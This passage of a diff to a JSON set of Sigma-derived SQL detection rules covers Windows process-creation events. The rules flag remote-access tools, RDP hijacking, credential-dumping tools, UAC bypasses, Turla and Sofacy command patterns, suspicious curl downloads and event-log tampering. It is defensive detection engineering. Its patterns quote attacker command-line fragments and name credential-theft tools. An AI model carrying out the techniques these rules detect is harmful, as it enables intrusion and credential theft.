"065b00ca-5d5c-4557-ac95-64a6d0b64d86", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution via stordiag.exe", + "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "status": "test", + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "author": "Austin Songer (@austinsonger)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of AnyDesk from a non-standard folder" + "Legitimate usage of stordiag.exe." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" + "filename": "proc_creation_win_stordiag_susp_child_process.yml" }, { - "title": "Suspicious RDP Redirect Using TSCON", - "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "title": "Script Interpreter Execution From Suspicious Folder", + "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", "status": "test", - "description": "Detects a suspicious RDP session redirect using tscon.exe", + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (NewProcessName LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tscon_rdp_redirect.yml" + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" }, { - "title": "PUA - NPS Tunneling Tool Execution", - "id": "68d37776-61db-42f5-bf54-27e87072d17e", - "status": "experimental", - "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "title": "HackTool - Windows Credential Editor (WCE) Execution", + "id": "7aa7009a-28b9-4344-8c1f-159489a390df", + "status": "test", + "description": "Detects the use of Windows Credential Editor (WCE)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Another service that uses a single -s command line switch" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nps.yml" + "filename": "proc_creation_win_hktl_wce.yml" }, { - "title": "Suspicious Modification Of Scheduled Tasks", - "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", - "status": "experimental", - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "status": "test", + "description": "Detects automated lateral movement by Turla group", + "author": "Markus Neis", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1053.005" + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_change.yml" + "filename": "proc_creation_win_apt_turla_commands_critical.yml" }, { - "title": "Execution via stordiag.exe", - "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", - "status": "test", - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "author": "Austin Songer (@austinsonger)", + "title": "Suspicious Curl.EXE Download", + "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "status": "experimental", + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate usage of stordiag.exe." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_stordiag_susp_child_process.yml" + "filename": "proc_creation_win_curl_susp_download.yml" }, { - "title": "Elise Backdoor Activity", - "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "title": "Devtoolslauncher.exe Executes Specified Binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", "status": "test", - "description": "Detects Elise backdoor activity used by APT32", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "The Devtoolslauncher.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Legitimate use of devtoolslauncher.exe by legitimate user" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_elise.yml" + "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" }, { - "title": "CMSTP UAC Bypass via COM Object Access", - "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "status": "stable", - "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", - "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", + "title": "Delete All Scheduled Tasks", + "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "status": "experimental", + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" + "filename": "proc_creation_win_schtasks_delete_all.yml" }, { - "title": "Rundll32 JS RunHTMLApplication Pattern", - "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "title": "UAC Bypass Using PkgMgr and DISM", + "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "status": "test", - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" }, { - "title": "Suspicious Whoami.EXE Execution From Privileged Process", - "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", + "title": "VolumeShadowCopy Symlink Creation Via Mklink", + "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "status": "stable", + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'whoami.exe' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" + "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" }, { - "title": "Renamed Mavinject.EXE Execution", - "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", - "status": "experimental", - "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "title": "MSHTA Suspicious Execution 01", + "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", + "status": "test", + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" ], "falsepositives": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((NewProcessName LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_mavinject.yml" + "filename": "proc_creation_win_mshta_susp_execution.yml" }, { - "title": "Suspicious Call by Ordinal", - "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "status": "stable", - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "author": "Florian Roth (Nextron Systems)", + "title": "Sofacy Trojan Loader Activity", + "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "status": "test", + "description": "Detects Trojan loader activity as used by APT28", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", "attack.defense_evasion", + "car.2013-10-002", "attack.t1218.011" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_by_ordinal.yml" + "filename": "proc_creation_win_apt_sofacy.yml" }, { - "title": "Copy from Admin Share", - "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", - "status": "test", - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "title": "Suspicious NTLM Authentication on the Printer Spooler Service", + "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "status": "experimental", + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Administrative scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml" + "filename": "proc_creation_win_rundll32_ntlmrelay.yml" }, { - "title": "Uninstall Sysinternals Sysmon", - "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", - "status": "test", - "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", - "author": "frack113", + "title": "HackTool - SharpEvtMute Execution", + "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "status": "experimental", + "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.002" ], "falsepositives": [ - "Legitimate administrators might use this command to remove Sysmon for debugging purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" + "filename": 